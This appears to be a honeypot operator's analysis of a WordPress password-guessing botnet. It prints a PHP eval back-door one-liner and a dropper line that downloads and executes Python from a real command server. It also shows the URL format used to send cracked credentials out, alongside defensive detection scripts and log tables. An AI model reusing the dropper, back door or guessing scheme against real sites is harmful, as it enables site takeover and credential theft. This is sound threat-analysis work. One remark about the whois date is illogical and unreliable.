120.229.163.49-2018-10-28a

Python Password Guesser

A PHP program that runs a Python program that enumerates WordPress user IDs, then tries to guess a working password for each user ID. The Python program reports any working user ID and password combos to 118.184.47.13. Uses xmlrpc.php to guess passwords rather than the wp-login.php human-friendly URL. Smart.

It appears that sites on which the Python program finds a working user ID/password are then recruited into guessing more user ID/password combos.

Origin

IP Address 120.229.163.49

I looked up 120.229.163.49 on 2018-11-04, about a week after this code arrived, so the information may be stale.

120.229.163.49 has no reverse lookup.

whois says:

irt:            IRT-CHINAMOBILE-CN
address:        China Mobile Communications Corporation
address:        29, Jinrong Ave., Xicheng District, Beijing, 100032
route:          120.224.0.0/12
descr:          China Mobile communications corporation
origin:         AS9808
mnt-by:         MAINT-CN-CMCC
last-modified:  2008-11-05T07:40:19Z

Last-modified date of 2008-11-05T07:40:19Z means I looked this up in UTC-0700 just after it was modified.

Download

The attackers sent an HTTP POST request to a URL ending in "/wp-content/themes/twentytwelve/404.php", with a single parameter named "dd". The value of "dd" was a string containing PHP source code.

I assume the attackers meant for the code to execute in one of the myriad of one-liner back doors. I find it very common to see plugin edits or theme uploads that would insert code like this:

<?php @eval($_POST['dd']);?><?php
/** 
 * @package Akismet
 */ 
/*  
...

That would execute the PHP of this attack perfectly.
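Because this kind of back door follows a fixed pattern, a crude search over theme and plugin files will find this particular variety. Below is a minimal sketch in Python. It assumes the back door calls eval() directly on a request superglobal, so obfuscated variants will slip past it. The function names are hypothetical.

```python
import re
from pathlib import Path

# eval() applied directly to a request superglobal, e.g. @eval($_POST['dd']);
ONE_LINER = re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)


def find_one_liners(php_text):
    """Return the 1-based line numbers of suspicious eval() calls."""
    return [n for n, line in enumerate(php_text.splitlines(), 1)
            if ONE_LINER.search(line)]


def scan_tree(root):
    """Walk a directory (e.g. wp-content) and map each .php file with hits
    to the line numbers that matched."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        lines = find_one_liners(path.read_text(errors="replace"))
        if lines:
            hits[str(path)] = lines
    return hits


sample = "<?php @eval($_POST['dd']);?><?php\n/** \n * @package Akismet\n */"
print(find_one_liners(sample))
```

Pointing scan_tree() at a site's wp-content directory would flag a modified Akismet file like the one above on its first line.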

Deobfuscation

I did no real deobfuscation, but I should explain how I got the Python source code. The PHP source code consisted of a single line:

file_put_contents("805399.py",file_get_contents("http://118.184.47.13:38080/mywww/netok/dir.py"));$a = system("python 805399.py", $status);print_r($a);print_r($status);

This downloads a Python file, executes it, then sends the output of the python program and its exit status back to the invoker.

file_put_contents("805399.py",file_get_contents("http://118.184.47.13:38080/mywww/netok/dir.py"));
$a = system("python 805399.py", $status);
print_r($a);
print_r($status);

I modified the code to get the python file, but not execute it.
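Editing the PHP works. The same two facts, where the Python comes from and what name it gets saved under, can also be read straight out of the payload text without running any of it. Below is a minimal sketch in Python. The regular expression is my own, and it only covers this file_put_contents(name, file_get_contents(url)) shape.

```python
import re

# The "dd" payload, copied from above.
PAYLOAD = (
    'file_put_contents("805399.py",file_get_contents('
    '"http://118.184.47.13:38080/mywww/netok/dir.py"));'
    '$a = system("python 805399.py", $status);print_r($a);print_r($status);'
)

# file_put_contents("NAME", file_get_contents("URL")) with optional whitespace
DROPPER_RE = re.compile(
    r'file_put_contents\(\s*"([^"]+)"\s*,\s*'
    r'file_get_contents\(\s*"([^"]+)"\s*\)\s*\)'
)


def find_droppers(php_source):
    """Return (local_filename, remote_url) pairs found in PHP source text."""
    return DROPPER_RE.findall(php_source)


for filename, url in find_droppers(PAYLOAD):
    print(filename, url)
```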

Analysis

There's hardly any PHP to speak of, but the Python program it downloads seems interesting.

Sequence of actions

  1. Request contents of http://118.184.47.13:38080/mywww/tests/counter.txt. This was just a string representation of a number. I got "7996" and "9142" when I tried this URL.
  2. Request contents of http://118.184.47.13:38080/mywww/tests/allNUMBER.txt, where NUMBER is the string it got in step (1). These contents consisted of domain names in MS-DOS text-file format (CRLF line endings). I downloaded the contents 3 times, as all7996.txt, all7997.txt and all9142.txt, getting 3 different batches of domain names.
  3. Request contents of http://118.184.47.13:38080/mywww/tests/num.php. It does nothing with the results of that request; I suspect it's a callback that verifies the Python program is working.
  4. Append all of the domain names from step (2) to a FIFO queue.
  5. Remove all files in directory "." (current working directory) that have names ending in ".py" or ".pyc" suffixes. This makes the Python code's source file unavailable for further access by other processes.
  6. Start 230 threads, each running function scaner.
  7. The main thread deletes files in the current working directory (".") that have names with ".txt" or ".py" suffixes. This seems a little redundant with step (5), except that it also gets rid of the files full of domain names downloaded in step (2).
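Steps (1), (2) and (4) amount to string handling. The sketch below does that string handling and makes no network requests. The helper names are hypothetical. Stripping whitespace from the counter value is my assumption, and a collections.deque stands in for whatever FIFO queue class the original uses.

```python
from collections import deque

# Base URL from steps (1) and (2).
BASE = "http://118.184.47.13:38080/mywww/tests/"


def domain_list_url(counter_text):
    """Step (2): the counter value selects the allNUMBER.txt file."""
    return BASE + "all" + counter_text.strip() + ".txt"


def load_domain_queue(list_text):
    """Step (4): one domain per CRLF-terminated line, appended to a FIFO queue."""
    queue = deque()
    for line in list_text.splitlines():  # splitlines() handles "\r\n"
        name = line.strip()
        if name:
            queue.append(name)
    return queue


url = domain_list_url("7996\r\n")
names = load_domain_queue("example.com\r\nexample.org\r\n\r\n")
print(url)
print(names.popleft(), len(names))
```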

Each thread running in function scaner:

  1. Tries to fill a 40-element queue of its own with domain names from the queue built in step (4) above. If the main queue of domain names is empty, it prints the phrase "di yi ge dui le man le alll!!!!!!1111111AAAABBBBBBBB" (apparently pinyin for something like "the first queue is full").

  2. For each domain name in its own queue, run function get_usernamelist() with the domain name and each of the author numbers 1 through 4. Function get_usernamelist() tries to get all posts made by that author number, and parses out the WordPress user ID of that author.

  3. For each of up to 3 user IDs obtained in step (2), create a password list. It comes mainly from an internal list of passwords, but also includes the user ID itself, the user ID doubled (user ID+user ID), and each of the internal passwords concatenated with the user ID.

  4. Put each of those passwords on a FIFO queue. Put part of the domain name on that queue too: for example, if this thread is attempting to guess WordPress passwords on host "www.something.com", it puts "something" on the queue. Put each of another list of 118 passwords on the queue, along with combinations of user ID and hostname. The queue ends up with about 400 passwords in it.

  5. For each of the user IDs, and each of the passwords, try to log in to WordPress via the /xmlrpc.php URL, apparently the "wp.getUsersBlogs" method.

  6. Should the thread stumble on a user ID and password that allows an XMLRPC login, send the user ID/password combo to:

    http://118.184.47.13:38080/mywww/data.php?name=pytestokpy700test2.txt&data=$SITE/wp-login.php,$USERID,$PASSWORD

  and

    http://118.184.47.13:38080/mywww/data.php?name=pytestokpyv2v700test2yanshijianyin5testkkkk.txt&data=$SITE/wp-login.php,$USERID,$PASSWORD

  and also print the password and user ID on stdout, which the small PHP program that delivers the Python will end up returning to the invoker.

  7. Sleep for a random number of seconds between 1000 and 2000. Presumably this keeps the Python program alive for any longer-running threads. It seems sloppy.
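The report is a plain-HTTP URL with the credentials in its query string. Anyone with proxy or egress logs can therefore check whether one of their own sites has been reported. Below is a minimal sketch in Python. The function name is hypothetical, and the code assumes the data parameter is laid out exactly as in the two URLs above.

```python
from urllib.parse import urlsplit, parse_qs

# Host, port and path from the report URLs above.
C2_NETLOC = "118.184.47.13:38080"
REPORT_PATH = "/mywww/data.php"


def leaked_credentials(logged_url):
    """Return (login_url, user_id, password) if a logged URL looks like one
    of the success reports described above, otherwise None."""
    parts = urlsplit(logged_url)
    if parts.netloc != C2_NETLOC or parts.path != REPORT_PATH:
        return None
    data = parse_qs(parts.query).get("data")
    if not data:
        return None
    fields = data[0].split(",")
    # Assumption: neither the site URL nor the password contains a comma.
    if len(fields) != 3:
        return None
    return tuple(fields)


# Placeholder site and credentials, not real data.
example = ("http://118.184.47.13:38080/mywww/data.php?name=pytestokpy700test2.txt"
           "&data=http://blog.example.com/wp-login.php,admin,s3cret")
print(leaked_credentials(example))
```

parse_qs decodes "+" as a space. A password that contains "+" and was sent without URL encoding would therefore come out altered.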

Coding style

I don't have Python expertise, so my judgement of coding style is suspect. I do know that I can write harder-to-understand PHP than Python, but I can still write obscure Python. This code seems to have more commented-out code than is common for Python. It uses a 4-space indent, rather than tabs or 2-space indents. The first few lines appear dodgy:

import urllib
import re
import urllib2
import sys
import base64

# !/usr/bin/python
# coding=utf-8
import urllib2
import urllib

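The code re-imports urllib and urllib2. It also looks like the first 6 lines are a later addition to an already existing piece of code. The # !/usr/bin/python line is a mistake: I don't believe a Linux (or any Unix) kernel would execute a Python interpreter with that extra space between "#" and "!" in it. The line isn't the first line of the file either, and the first line is the only place a kernel looks for an interpreter, so it is just a comment. Since the PHP runs the file as "python 805399.py", no interpreter line is needed anyway.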
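Two quick checks make the point. A kernel only honors "#!" as the first two bytes of a file, and PEP 263 only honors an encoding declaration on line 1 or 2. Run against the header above, neither the interpreter line nor the "# coding=utf-8" line qualifies. Below is a minimal sketch in Python. The regular expression is the one PEP 263 gives, and the helper names are my own.

```python
import re

# The first lines of the downloaded Python, copied from above.
HEADER = """import urllib
import re
import urllib2
import sys
import base64

# !/usr/bin/python
# coding=utf-8
import urllib2
import urllib
"""

# PEP 263 encoding-declaration pattern; it only counts on line 1 or 2.
CODING_RE = re.compile(r"^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)")


def has_shebang(source):
    """An interpreter line must start with the exact bytes "#!"."""
    return source.startswith("#!")


def declared_encoding(source):
    """Return the PEP 263 encoding if declared on line 1 or 2, else None."""
    for line in source.splitlines()[:2]:
        match = CODING_RE.match(line)
        if match:
            return match.group(1)
    return None


print(has_shebang(HEADER), declared_encoding(HEADER))
```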

Combined with other aspects of the code, like assuming "." names the current working directory, it looks like this Python was written to execute under Linux or other Unix-like OSes, but not Windows.

The code does have some unused pieces. A variable named ip_list gets initialized with addresses like 127.0.0.1, 8.8.8.8 and 8.8.4.4, which makes me think it's a list of IP addresses to avoid, but it never gets used. There's also a function joomalexp that's never called. It appears to try an object-deserialization exploit against Joomla CMSes, but since nothing invokes it, it does nothing.

Referer

The code uses a Referer string of "http://www.google.com.hk" for XMLRPC calls. My server has recorded 4754 HTTP requests made with that string, from 2017-07-24 01:24:06-06 to 2018-10-17 11:20:12-06.

User Agent

The code sends a User Agent string of "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36". My server has recorded 6281 HTTP requests possessing that string from 2015-04-15 01:19:10-06 to 2018-10-17 11:20:12-06.

My server has recorded 4754 requests with that combo of user agent and referer, from 2017-07-24 01:24:06-06 to 2018-10-17 11:20:12-06.

| IP Address | HTTP requests | First seen | Last appearance |
|---|---|---|---|
| 61.119.116.19 | 3197 | 2018-10-09 23:23:52-06 | 2018-10-14 14:09:29-06 |
| 91.200.12.9 | 1518 | 2018-02-27 06:48:13-07 | 2018-03-16 15:17:11-06 |
| 198.27.69.191 | 8 | 2018-10-17 10:51:20-06 | 2018-10-17 11:20:12-06 |
| 91.211.88.234 | 4 | 2018-09-20 05:06:56-06 | 2018-09-20 21:04:51-06 |
| 69.197.147.130 | 4 | 2017-09-08 12:18:35-06 | 2017-09-09 20:16:21-06 |
| 86.110.117.213 | 4 | 2018-08-23 02:09:45-06 | 2018-08-23 07:02:29-06 |
| 120.229.163.101 | 4 | 2018-03-07 18:59:25-07 | 2018-03-07 19:01:43-07 |
| 5.188.136.72 | 2 | 2018-07-05 03:24:38-06 | 2018-07-05 03:24:50-06 |
| 94.23.251.169 | 2 | 2018-10-08 03:39:29-06 | 2018-10-08 03:39:33-06 |
| 107.150.63.170 | 2 | 2017-07-24 01:24:06-06 | 2017-07-24 02:36:29-06 |
| 120.229.163.53 | 2 | 2018-09-20 00:06:28-06 | 2018-09-20 00:06:29-06 |
| 5.188.136.151 | 2 | 2018-07-12 20:46:25-06 | 2018-07-12 20:46:49-06 |
| 120.229.163.114 | 2 | 2018-09-20 10:55:07-06 | 2018-09-20 10:55:09-06 |
| 173.208.148.218 | 2 | 2017-09-21 17:36:44-06 | 2017-09-21 17:36:45-06 |
| 45.77.123.166 | 1 | 2017-10-21 11:42:45-06 | 2017-10-21 11:42:45-06 |
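A table like this is a GROUP BY on the client address, with count(*), min() and max() of the timestamp. In Postgres that is one query. Below is the same aggregation sketched in Python, over records I've assumed are already parsed into tuples. The sample records are made up and use documentation addresses.

```python
from collections import defaultdict
from datetime import datetime

REFERER = "http://www.google.com.hk"
USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36")


def summarize(records):
    """records: iterable of (ip, timestamp, referer, user_agent) tuples.
    Returns (ip, count, first_seen, last_seen) rows for requests carrying
    both strings, most active address first."""
    stats = defaultdict(list)
    for ip, ts, referer, agent in records:
        if referer == REFERER and agent == USER_AGENT:
            stats[ip].append(ts)
    rows = [(ip, len(times), min(times), max(times))
            for ip, times in stats.items()]
    return sorted(rows, key=lambda row: row[1], reverse=True)


# Made-up records; the last one has a different user agent and is skipped.
t = datetime.fromisoformat
records = [
    ("192.0.2.1", t("2018-01-02T10:00:00-07:00"), REFERER, USER_AGENT),
    ("192.0.2.1", t("2018-01-03T12:30:00-07:00"), REFERER, USER_AGENT),
    ("198.51.100.7", t("2018-06-01T08:00:00-06:00"), REFERER, USER_AGENT),
    ("203.0.113.9", t("2018-06-01T08:05:00-06:00"), REFERER, "curl/7.58.0"),
]
for row in summarize(records):
    print(row)
```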

It looks like 91.200.12.9 did WordPress password guessing along with a little user ID enumeration against my WordPress honey pot. 61.119.116.19 did a single access of the WordPress login page, then proceeded straight to password guessing.

My WordPress honey pot acts like it will allow you to look up all posts by a given author number. Author 1 is usually the WordPress admin user. My honey pot generates random strings for other user IDs, but puts an "a2" prefix on user ID 2's random string. 91.200.12.9 used "admin" and several "a2"-prefixed user IDs, so whatever software it ran did use the results of user ID enumeration in its password guessing.
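The "a2" prefix works as a canary. A user ID that only ever appeared in an author lookup, and then shows up in a login attempt, ties the two activities together. Below is a hypothetical imitation of the idea in Python, not my honey pot's actual code. The function names, the 8-hex-digit random suffix and the cutoff at author 10 are assumptions.

```python
import secrets


def honeypot_author_slug(author_number, issued):
    """Hand out a user ID for an author lookup and remember it in `issued`.
    Author 1 is "admin", author 2 gets an "a2" prefix, others are random."""
    if author_number > 10:
        return None
    if author_number == 1:
        slug = "admin"
    else:
        prefix = "a2" if author_number == 2 else ""
        slug = prefix + secrets.token_hex(4)
    issued[slug] = author_number
    return slug


def enumeration_reused(login_names, issued):
    """Login user names that could only have come from author enumeration."""
    return [name for name in login_names if name in issued and name != "admin"]


issued = {}
slug = honeypot_author_slug(2, issued)
print(slug.startswith("a2"), enumeration_reused(["admin", slug, "root"], issued))
```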

Odd HTTP header

It looks like the Python code would put a header on its request that usually accompanies proxied HTTP requests:

X-Forwarded-For:  8.8.8.8

That's Google's public DNS server IP address.

Unfortunately, I don't keep track of most of the goofy headers that come my server's way. It seems weird enough that I thought I might mention it.
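One cheap check a server could make is to flag X-Forwarded-For values that can't plausibly belong to a real client, such as a public DNS resolver or a loopback address. This is an assumption on my part, not something my server does. 8.8.8.8 is the value seen here. 8.8.4.4 and 127.0.0.1 are included because they sit in the code's unused ip_list alongside it. Below is a sketch using Python's ipaddress module.

```python
import ipaddress

# 8.8.8.8 is the observed value; 8.8.4.4 is Google's other public resolver.
PUBLIC_RESOLVERS = {ipaddress.ip_address("8.8.8.8"),
                    ipaddress.ip_address("8.8.4.4")}


def implausible_xff(header_value):
    """True if any hop in an X-Forwarded-For header is a public DNS
    resolver, a loopback address, or not an IP address at all."""
    for hop in header_value.split(","):
        try:
            addr = ipaddress.ip_address(hop.strip())
        except ValueError:
            return True
        if addr in PUBLIC_RESOLVERS or addr.is_loopback:
            return True
    return False


print(implausible_xff(" 8.8.8.8"), implausible_xff("203.0.113.7"))
```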

Domain Lists

I retrieved the http://118.184.47.13:38080/mywww/tests/counter.txt URL's contents 7 times. I lost the first number, but I got numbers and downloaded corresponding domain name lists 6 times.

| Timestamp | Counter value | Domain list file | Number of names |
|---|---|---|---|
| 2018-10-28T11:44-0600 | 7996 | all7996.txt | 10769 |
| 2018-10-29T22:29-0600 | 7997 | all7997.txt | 10769 |
| 2018-11-03T21:40-0600 | 9142 | all9142.txt | 2297 |
| 2018-11-04T11:51-0700 | 5324 | all5324.txt | 2400 |
| 2018-11-04T11:52-0700 | 5324 | all5324.txt | 2400 |
| 2018-11-04T12:05-0700 | 5411 | all5411.txt | 2297 |

Doing "5324" twice was just to see whether the number makes a difference. It seems to: both "5324" downloads are identical.

230 threads times 40 domain names per thread = 9200 domain names. Some threads will get 2 groups of 40 domain names to guess on for the larger 10769 name files. Most of the threads get no domain names for the smaller files.
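Below is a sketch of the arithmetic behind that paragraph. It assumes each thread keeps taking 40-name batches until the main queue is empty, and that batches spread evenly across threads. Real thread scheduling won't guarantee the even spread.

```python
import math

THREADS = 230
BATCH = 40


def batch_plan(domain_count, threads=THREADS, batch=BATCH):
    """Return (batches, busy_threads, idle_threads, second_batches)."""
    batches = math.ceil(domain_count / batch)  # last batch may be partial
    busy_threads = min(batches, threads)
    idle_threads = threads - busy_threads
    second_batches = max(0, batches - threads)
    return batches, busy_threads, idle_threads, second_batches


for count in (10769, 2400, 2297):
    print(count, batch_plan(count))
# 10769 (270, 230, 0, 40)
# 2400 (60, 60, 170, 0)
# 2297 (58, 58, 172, 0)
```

Under these assumptions, the 10769-name lists give 40 threads a second batch, and the smaller lists leave 170 or more of the 230 threads with nothing to do.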

Files all7996.txt and all7997.txt share only one domain name, "host60.onesourcepsg.com". No other domain names are shared between any two files.
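Checking for names shared between downloaded lists is a set intersection for each pair of files. Below is a minimal sketch in Python. Lower-casing the names is my assumption, since DNS names are case-insensitive. The file names and domains in the example are placeholders.

```python
from itertools import combinations


def shared_names(lists):
    """lists: {file_name: iterable of domain names}. Returns every pair of
    files that share at least one name, mapped to the shared names."""
    sets = {name: {d.strip().lower() for d in domains if d.strip()}
            for name, domains in lists.items()}
    shared = {}
    for a, b in combinations(sorted(sets), 2):
        common = sets[a] & sets[b]
        if common:
            shared[(a, b)] = sorted(common)
    return shared


example = {
    "allA.txt": ["x.example", "Host.example"],
    "allB.txt": ["host.example\r", "y.example"],
    "allC.txt": ["z.example"],
}
print(shared_names(example))
```

With real files, Path(p).read_text().splitlines() would supply each list. Text mode already turns the CRLF line endings into plain newlines.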

I'm not sure I can see a purpose for the method of getting a number from http://118.184.47.13:38080/mywww/tests/counter.txt, then turning around and using that number to download a batch of domain names. It's possible that the numbers are something like hash buckets for the domain names. Any domain name that's had a guessing pass comes out of its bucket, all the while new hosts are added to the buckets. This seems like the hard way to try to guarantee password guessing on all the host names you've got.

Password Lists

The Python source code contains two different lists of passwords.

  1. 118 passwords used as-is.
  2. 265 passwords to concatenate with the user name, which the code calls fuzzlist.

There are 80 of the 118 plain passwords not in the fuzzlist, and 229 fuzzlist passwords not in the list of plain passwords, so there's some overlap.
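Taken at face value, the counts imply 118 - 80 = 38 shared entries counting from one list, and 265 - 229 = 36 counting from the other. Two sets share the same number of members whichever side you count from. A mismatch like that therefore suggests repeated entries in one of the lists, or a miscount. Below is a sketch of a small helper that reports both counts alongside the duplicate counts, which would show which explanation applies. The toy lists in the example are made up.

```python
def overlap_report(plain, fuzz):
    """Compare two password lists entry by entry and as sets."""
    plain_set, fuzz_set = set(plain), set(fuzz)
    return {
        "plain_entries": len(plain),
        "fuzz_entries": len(fuzz),
        "plain_not_in_fuzz": sum(1 for p in plain if p not in fuzz_set),
        "fuzz_not_in_plain": sum(1 for p in fuzz if p not in plain_set),
        "shared_distinct": len(plain_set & fuzz_set),
        "plain_duplicates": len(plain) - len(plain_set),
        "fuzz_duplicates": len(fuzz) - len(fuzz_set),
    }


# "b" appears twice in the first list, so the two "shared" counts differ.
print(overlap_report(["a", "b", "b", "c"], ["b", "c", "d"]))
```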

Since IP address 61.119.116.19 seems to have the most accesses, it's worth looking closer. I keep a Postgres database of all web accesses of my server.

| Access No. | Timestamp | Bytes sent | Path part of URL |
|---|---|---|---|
| 4 | 2018-10-09T23:24:10-06 | 18229 | //?author=1 |
| 460 | 2018-10-10T06:24:02-06 | 15641 | //?author=2 |
| 916 | 2018-10-10T15:25:06-06 | 0 | //?author=3 |
| 917 | 2018-10-10T15:25:56-06 | 0 | //?author=4 |
| 918 | 2018-10-10T15:26:18-06 | 0 | //?author=5 |
| 920 | 2018-10-14T02:45:33-06 | 18229 | //?author=1 |
| 1376 | 2018-10-14T04:58:48-06 | 15715 | //?author=2 |
| 1832 | 2018-10-14T07:26:10-06 | 15696 | //?author=3 |
| 2288 | 2018-10-14T10:05:57-06 | 15695 | //?author=4 |
| 2744 | 2018-10-14T12:17:17-06 | 15674 | //?author=5 |

My WordPress honey pot always gives out "admin" as the user ID of author #1, and composes a random string with an "a2" prefix for author #2. It randomly decides on other authors, up to author #10. You can see that access numbers 4 through 918 check author numbers sequentially up to 5, just like the Python code described here does. The honey pot gave back no bytes for authors 3, 4 and 5. There are 454 login attempts between accesses 4 and 460, and 455 between accesses 460 and 916. In the second round, there are 455 login attempts between accesses 1376 and 1832, 455 between 1832 and 2288, and 456 between 2288 and 2744. That matches the password lists in this Python code, and how the code combines some of those lists with user IDs.
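Counting login attempts between author probes, as in the access numbers above, takes a single pass over the log in access order. Below is a sketch in Python. It assumes the paths are already sorted by access number. The caller supplies the test for what counts as a login attempt, and that predicate (for example, a POST to /xmlrpc.php) is an assumption.

```python
import re

AUTHOR_PROBE = re.compile(r"[?&]author=(\d+)")


def attempts_between_probes(paths, is_login):
    """paths: URL paths in access order. is_login: predicate marking a
    password-guessing request. Yields (from_author, to_author, attempts)
    for each pair of consecutive author probes."""
    previous = None
    count = 0
    for path in paths:
        match = AUTHOR_PROBE.search(path)
        if match:
            author = int(match.group(1))
            if previous is not None:
                yield previous, author, count
            previous, count = author, 0
        elif previous is not None and is_login(path):
            count += 1


log = ["//?author=1", "/xmlrpc.php", "/xmlrpc.php",
       "//?author=2", "/xmlrpc.php", "//?author=3"]
print(list(attempts_between_probes(log, lambda p: p.endswith("xmlrpc.php"))))
```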

Unfortunately, my honey pot's xmlrpc.php is not up to the task of recording the passwords that got sent in, so I can't verify that the same list got used.
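A honey pot written in Python could record the credentials by decoding the POST body with the standard library's xmlrpc.client.loads(), which returns the parameters and the method name. In WordPress's XML-RPC API, wp.getUsersBlogs takes the user name and password as its two parameters. This is a sketch, not what my honey pot does. The Python documentation warns that the xmlrpc modules are not secure against maliciously constructed data, so anything facing the internet would want a hardened parser such as the defusedxml package.

```python
import xmlrpc.client


def log_xmlrpc_call(body):
    """Decode a POSTed XML-RPC request body and return what a honey pot
    might record. For wp.getUsersBlogs, params are (username, password)."""
    params, method = xmlrpc.client.loads(body)
    record = {"method": method}
    if method == "wp.getUsersBlogs" and len(params) >= 2:
        record["user"], record["password"] = params[0], params[1]
    return record


# Build a sample request body locally with placeholder credentials.
sample = xmlrpc.client.dumps(("admin", "a2secret"), "wp.getUsersBlogs")
print(log_xmlrpc_call(sample))
```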

IP Address 118.184.47.13

The command and control for this Python program has an IP address of 118.184.47.13.

118.184.47.13 had no reverse DNS entry as of 2018-11-04.

whois says:

inetnum:        118.184.0.0 - 118.184.63.255
netname:        ANCHNET
descr:          Shanghai Anchnet Network Technology Stock Co.,Ltd
country:        CN
admin-c:        CJ2546-AP
tech-c:         JY3624-AP
last-modified:  2017-12-11T03:07:27Z
irt:            IRT-CNISP-CN
address:        Beijing CNISP Technology Co., Ltd
last-modified:  2017-05-03T07:08:38Z

Nothing obvious connects it to the attacking IP address 120.229.163.49.

nmap thinks that Microsoft Windows Server 2003 SP2 runs on that IP address.